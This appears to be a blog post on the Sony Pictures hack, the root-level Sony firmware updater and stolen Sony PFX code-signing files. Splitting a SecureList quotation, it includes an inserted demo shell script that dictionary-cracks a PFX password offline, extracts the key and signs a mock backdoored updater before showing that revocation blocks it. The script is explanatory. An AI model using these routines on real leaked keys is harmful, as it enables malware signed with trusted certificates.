Sony Pictures Hacked: Do You Really Want to Update your Camera Firmware with a Sony Updater that Runs as 'root'?
A month ago I wrote in Sony Firmware Updater: a Security Risk that the Sony firmware updater carried serious security risks, because it runs as a kernel extension (complete control over the system). It turned out to be a prescient blog post.
If you have not been following it, the IT infrastructure of Sony Pictures was hacked, taking down large chunks of Sony's operations for at least a week, according to news reports, as well as exposing all sorts of juicy material to public view, such as internal emails, as the Wall Street Journal reports in At Sony Pictures, Drama in Email. And apparently a lot more.
Ask yourself a simple question: do you want to run a Sony updater that runs as "root" (total control over the system) from a company that has been hacked in one of the most devastating IT attacks in memory? (Update: Sony private keys have been stolen; see below.)
Why would the perpetrator stop at Sony Pictures? What is to stop malware from being inserted into the Sony updater, which, having complete control over your system as root, could do anything it wants, such as keylogging all your passwords and then emptying your financial accounts, or similar fun. Without Sony having a clue. Or you. Until you find that all your bank accounts are empty.
Sony private keys stolen
The paragraphs above were written before your author knew that keypairs had been stolen; this section was added afterward.
A PFX (PKCS#12) file bundles a certificate with the private key corresponding to its public key, usually protected by a password.
Compromise of the private key of a public/private keypair is a massive security blunder with huge ramifications: anything signed with that key, by whoever holds it, is reported as "verified" by every system that trusts the certificate. Yet SecureList.com reports that Sony PFX files containing private keys have been stolen.
If the PFX files are not protected with unusually strong passwords, the passwords can be cracked offline: the attacker holds the file, so nothing rate-limits the guessing, and massively parallel (GPU or cloud) cracking services can be thrown at it. Once a private key is compromised, hacker malware can be inserted into desired content and then signed with the now compromised key. The software/content would be valid by definition, since it is signed with the genuine key. For that reason Sony should immediately revoke the certificates for all of the stolen keypairs, so that verifiers stop trusting signatures made with them; note that revocation only helps on systems that actually check revocation status, so software already signed with those keys deserves suspicion regardless. Yet so far, it seems that Sony is mum on the stolen keypair issue. If correct, that is grossly and perhaps criminally irresponsible, because of the huge worldwide potential for damage from compromised user systems.
It is inconceivable that a private key used by a major corporation to sign software should sit on any network-accessible computer rather than in a hardware security module or on an offline signing machine. It is gross negligence. Yet this is apparently what Sony has made its practice, for how else could PFX files have been stolen?
Put simply, the smart move is to assume that ALL Sony digitally-signed content/software might be compromised (now or in the coming months). As SecureList.com puts it:
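To make the chain concrete (leaked PFX, weak password cracked offline, stolen key used to sign a backdoored updater that then "verifies", and revocation as the only remaining defence), here is an added example that is not from the original post and uses nothing of Sony's. It needs only the openssl command-line tool; the publisher name, the PFX password, the wordlist, the "updater" payload and the revocation list are all constructed for the demo.

```shell
#!/bin/sh
# Added example (not part of the original post): why a leaked PFX file with a
# guessable password is a complete code-signing compromise. Requires openssl.
# Every name, password and file below is constructed for the demonstration.
set -eu

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT

# 1. The publisher's code-signing keypair and self-signed certificate, exported
#    as a password-protected PFX (PKCS#12), exactly the kind of file that leaked.
make_publisher_pfx() {
    pfx_pass="$1"
    openssl req -x509 -newkey rsa:2048 -nodes -sha256 -days 30 \
        -subj "/CN=Example Publisher Code Signing" \
        -keyout "$WORK/sign.key" -out "$WORK/sign.crt" >/dev/null 2>&1
    openssl pkcs12 -export -inkey "$WORK/sign.key" -in "$WORK/sign.crt" \
        -out "$WORK/publisher.pfx" -passout "pass:$pfx_pass"
}

# 2. Offline dictionary attack on the stolen PFX. Each guess is a local MAC
#    check, so nothing rate-limits it; prints the password when it is found.
crack_pfx() {
    pfx="$1"; wordlist="$2"
    while IFS= read -r guess; do
        if openssl pkcs12 -in "$pfx" -passin "pass:$guess" -nokeys -noout >/dev/null 2>&1; then
            printf '%s\n' "$guess"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# 3. With the recovered password, extract the private key and sign any payload.
sign_with_stolen_key() {
    pfx="$1"; pass="$2"; payload="$3"; sig="$4"
    openssl pkcs12 -in "$pfx" -passin "pass:$pass" -nocerts -nodes \
        -out "$WORK/stolen.key" >/dev/null 2>&1
    openssl dgst -sha256 -sign "$WORK/stolen.key" -out "$sig" "$payload"
}

# 4. What a naive verifier sees: the signature checks out against the
#    publisher's certificate, so "signed" is treated as "genuine".
verify_signature() {
    cert="$1"; payload="$2"; sig="$3"
    openssl x509 -in "$cert" -pubkey -noout > "$WORK/pub.pem"
    openssl dgst -sha256 -verify "$WORK/pub.pem" -signature "$sig" "$payload" >/dev/null 2>&1
}

# 5. The only fix once the key is out: revoke the certificate. This verifier
#    also consults a revocation list (a constructed stand-in for a CRL, holding
#    SHA-256 certificate fingerprints) and rejects the same signature.
cert_fingerprint() {
    openssl x509 -in "$1" -noout -fingerprint -sha256 | cut -d= -f2 | tr -d ':'
}
verify_with_revocation() {
    cert="$1"; payload="$2"; sig="$3"; revoked_list="$4"
    fp="$(cert_fingerprint "$cert")"
    if grep -qx "$fp" "$revoked_list"; then
        return 1   # certificate revoked: refuse regardless of signature validity
    fi
    verify_signature "$cert" "$payload" "$sig"
}

demo() {
    make_publisher_pfx "sony123"   # weak, guessable PFX password (constructed)
    printf '%s\n' "password" "123456" "sony123" "letmein" > "$WORK/wordlist.txt"
    pass="$(crack_pfx "$WORK/publisher.pfx" "$WORK/wordlist.txt")"
    echo "cracked PFX password: $pass"
    # A constructed "updater" carrying a backdoor marker, signed with the stolen key.
    printf 'camera-firmware-updater v1.0\nBACKDOOR: keylogger\n' > "$WORK/updater.bin"
    sign_with_stolen_key "$WORK/publisher.pfx" "$pass" "$WORK/updater.bin" "$WORK/updater.sig"
    if verify_signature "$WORK/sign.crt" "$WORK/updater.bin" "$WORK/updater.sig"; then
        echo "accepted: backdoored updater verifies with the publisher's certificate"
    fi
    cert_fingerprint "$WORK/sign.crt" > "$WORK/revoked.txt"
    if ! verify_with_revocation "$WORK/sign.crt" "$WORK/updater.bin" "$WORK/updater.sig" "$WORK/revoked.txt"; then
        echo "rejected: certificate is on the revocation list"
    fi
}

demo
```

The point of step 4 is that the verifier is doing nothing wrong: the key really is the publisher's, so cryptographic validity tells you nothing about who ran the signing tool. Step 5 is why revocation matters, and also why it is not enough on its own: a system that never fetches the revocation list keeps accepting the backdoored file.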
So far dozens of PFX files have been leaked online. PFX files contain the needed private key and certificate. Such files are password protected, but those passwords can be guessed or cracked. Not all of these PFX files will be of immediate value to attackers.
The importance of leaked code-signing keys cannot be overestimated. Software signed by a trusted publishing house will generally be trusted by the operating system, security software and first responders. It's an extremely powerful way for attackers to stay below the radar.
The scope of the recent hack of Sony Pictures — in which unidentified infiltrators breached the Hollywood studio’s firewall, absconded with many terabytes of sensitive information and now regularly leak batches of damaging documents to the media — is only beginning to be grasped. It will take years and perhaps some expensive lawsuits too before anyone knows for certain how vast a problem Sony’s digital Valdez may be.
But the take-away for the rest of the world beyond Sony and Hollywood is plain: Being cavalier about cybersecurity, as Sony's attitude in recent years has been characterized, is like playing a game of corporate Russian roulette.
Sony counterattacks?
Stolen content has appeared on various sites, and apparently Sony is attacking the sites hosting it, a dubious practice at best and possibly illegal here in the USA. The article reporting this does not cite its sources, other than "two people with direct knowledge of the matter", so it could be incorrect, but it would not be out of character with Sony's past ethical lapses.
Now, forgetting Sony, consider whether the 'Cloud' is safe: Apple and Google and so on are tempting targets for every hacker. Do you want to store your stuff in the Cloud? Storing anything sensitive in the Cloud is a really bad idea, judging by the constant and ongoing security breaches one can read about every week. The advice here is "think about it". But hey, cats don't do it and celebrities do.
But all such stuff is trivial in the Big Picture, and Sony is just the canary in the coal mine. News reports indicate that USA power infrastructure has been hacked. Consider the taking down of critical infrastructure of all kinds by skilled hackers backed by a foreign government. The recent Turkish pipeline explosion was a non-event in terms of all the internet-connected gear that was supposed to monitor the pipeline and report failures. But stuff blew up and burned nonetheless.
Now consider the same 'Turkish' ideas applied simultaneously to every power plant, nuke plant, electrical and pumping substation, dam, ventilation system, pipeline, railroad and hospital, and even home power meters (installed by mandate on every home here in California by jackasses with no concept of security risks). All at once, with a few keystrokes, everything everywhere stops working. Stuff shuts down, blows up. Maybe a nuke melts down for good measure. To put any critical infrastructure on the internet is criminally negligent by design. Cut off the water and power and nothing works, possibly for weeks and months if hackers persist. Millions die in urban areas from deprivation of food and water (consider even simple things, like cutting off the natural gas supply during a severe cold front in winter). Riots and anarchy reign. Or just shoot out a few key transformers across the country. Yet this national security threat hardly registers with any of our professional politicians. The next war may not have a shot fired.